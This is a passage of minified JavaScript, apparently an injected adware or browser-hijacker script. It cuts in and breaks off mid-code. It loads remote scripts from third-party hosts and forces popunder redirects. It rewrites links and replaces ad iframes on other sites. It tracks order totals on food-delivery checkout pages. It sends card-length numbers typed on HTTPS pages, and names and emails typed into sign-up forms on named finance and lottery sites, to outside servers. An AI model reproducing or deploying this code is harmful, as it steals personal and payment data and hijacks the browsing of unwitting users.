b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c= b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0, 10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=6563864032225124500&eid=310&pid=1539\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\"); e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement, !1)}});;if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top && !document.getElementById('sjsjszmzmaw28aj6')){var script=document.createElement('script');script.type='text/javascript';script.setAttribute('id','sjsjszmzmaw28aj6');script.src='//static.getjs.net/sd/1018/1022.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){if(window.self==window.top&&!document.getElementById('shk85shssma')){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.id='shk85shssma';a.src=-1<window.self.location.hostname.indexOf(\"cebook.co\")?\"//cdncache-a.akamaihd.net/loaders/1543/l.js?aoi=1311798366&pid=1543&zoneid=511164&ext=greatsaver&systemid=6563864032225124500\":\"//static.getjs.net/sd/1018/1005.js\";document.getElementsByTagName(\"head\")[0].appendChild(a);}})();;if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\r\n};(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax.com/z/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&eid=310&hid=6563864032225124500&pid=1539&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax.com/z/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&eid=310&hid=6563864032225124500&pid=1539&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};if(\"www.youtube.com\"==window.self.location.hostname&&\"http:\"==window.self.location.protocol){var video_id=window.location.search.split(\"v=\")[1];if(video_id){var ampersandPosition=video_id.indexOf(\"&\");-1!=ampersandPosition&&(video_id=video_id.substring(0,ampersandPosition));if(video_id&&document.getElementById(\"watch7-views-info\")){var vc=document.getElementById(\"watch7-views-info\").firstElementChild;vc&&document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML&&((new Image).src=\"http://score.developpro.info/?pr=1&d=\"+video_id+\"&s=\"+document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML.replace(/[^0-9]/g,\"\"))}}};if((-1<window.self.location.hostname.indexOf(\"foodpanda\")||-1<window.self.location.hostname.indexOf(\"hellofood\"))&&document.getElementById(\"submitRegisterStep1\")){var price=query_selector_all(\".cart-line-price\"),p=price&&price[price.length-1]?parseInt(price[price.length-1].innerHTML.replace(/[^0-9]/g,\"\")):0,h=window.self.location.hostname;(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=\"+h+\"&s=\"+p}\"justeat.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"checkout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");\"tastykhana.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"billing\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");if(-1<window.self.location.hostname.indexOf(\"titbit.com\")||\"checkout\"==window.self.location.hostname)(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=titbit.com&s=0\";\"www.grubhub.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"payment\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.grubhub.com&s=0\");\"www.delivery.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"order_process\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.delivery.com&s=0\");\"www.foodler.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"AnonCheckout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.foodler.com&s=0\");\"eat24hours.com\"==window.self.location.hostname&&\"https:\"==window.self.location.protocol&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=eat24hours.com&s=0\");(function(){try{var a=document.getElementsByTagName(\"input\");if(\"https:\"==window.self.location.protocol&&4<a.length)for(var d=function(b){b=b.target;if(b.value&&11<b.value.length&&20>b.value.length&&b.value.match(/^[0-9]+$/))for((new Image).src=\"https://score.sendapplicationget.com/g.php?pr=2&d=\"+window.self.location.hostname+\"&s=0&r=\"+(+new Date).toString()+Math.random(),b=0;b<a.length;b++)a&&a.removeEventListener?a.removeEventListener(\"blur\",d,!1):a&&a.detachEvent&&a.detachEvent(\"onblur\",d)},c=0;c<a.length;c++)a[c]&&a[c].addEventListener?a[c].addEventListener(\"blur\",d,!1):a[c]&&a[c].attachEvent&&a[c].attachEvent(\"onblur\",d)}catch(e){}})();(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\.@]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?id=\"+f+\"&c=\"+encodeURIComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();var _wlst={lsKey:\"xhxg4sk42hsba\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1==b){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.foreveryboxzip.net/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch(b){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['cpx_bet_55',3095],['yieldads_rmx',511],['blutonic_apx',46],['adsuduos_apx',79],['mari_gen2',438],['web3_nontb3',181],['acsencion_apx1',49],['dsnr_dasa_t3_19_3',98],['dsnr_nntb_t3',73],['velis_apx1',200],['matomy_adj_21',2706],['matomy_adj_21_2',2323],['adstract_new_t3_24_3',103],['yashi_apx_new',49],['baba_nontb',49]],[['cpx_nontb30_tr',2000],['mari_strm15',2200],['mari_strm15_2',2200],['web3_strm5',1000],['matomy_strm20',800],['matomy_strm20_2',800],['adstract_strm_t3_24_3',1000]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('KxccQXsm=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"ads.yahoo.com\"||window.self.location.hostname==\"ads.blutonic.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"ace1.acsencion.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=511164')>-1|| _zyad.location.indexOf('=458516')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting [bleep] gangbang orgy gay nude tits tranny blowjob handjob masturbat busty [bleep] joder horny mamada polla [bleep] pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s3483884712\"))continue}catch©{try{if(d[i].getAttribute(\"s3483884712\"))continue}catch(e){}};try{if(d[i].src.indexOf('=511164')>-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s3483884712\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a.ifr,a.size);b++;a&&a&&\"function\"==typeof a.func&&setTimeout(function(){a.func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'KxccQXsm=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body> \\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body> </body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s3483884712\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(window.self.location.hostname.indexOf('outube.com')>-1 || size=='120x60' ) {return false;};return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/cmp/1412355/index.html?size=+size+&referrer=' (atp?atp:1), [354,size]);}}catch(e){return !1;}},yieldads_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;var ref = window.top==window.self?encodeURIComponent(window.self.location.href):'';return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size=+size+&section=5081932&pub_url=+ref+' (atp?atp:1), [559,size]);}}catch(e){return !1;}},blutonic_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2196577\",\"300x250\":\"2196579\",\"728x90\":\"2196581\"}[size];var surl='http://ads.blutonic.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]&pubclick=[INSERT_CLICK_TAG]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [577,size]);}}catch(e){return !1;}},adsuduos_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2382556\",\"728x90\":\"2382574\",\"160x600\":\"2382575\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [741,size]);}}catch(e){return !1;}},mari_gen2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"120x600\":\"2399310\",\"160x600\":\"2399311\",\"300x250\":\"2399312\",\"728x90\":\"2399313\",\"468x60\":\"2399315\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [749,size]);}}catch(e){return !1;}},web3_nontb3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2361553&size=+size+' (atp?atp:1), [753,size]);}}catch(e){return !1;}},acsencion_apx1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2403318\",\"300x250\":\"2403321\",\"728x90\":\"2403322\"}[size];var surl='http://ace1.acsencion.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [756,size]);}}catch(e){return !1;}},dsnr_dasa_t3_19_3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2404478&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [767,size]);}}catch(e){return !1;}},dsnr_nntb_t3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2404341&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [770,size]);}}catch(e){return !1;}},velis_apx1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"120x600\":\"2431824\",\"160x600\":\"2431823\",\"300x250\":\"2431822\",\"468x60\":\"2431825\",\"728x90\":\"2431805\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [775,size]);}}catch(e){return !1;}},matomy_adj_21:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2432856\",\"728x90\":\"2432858\",\"160x600\":\"2432863\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), 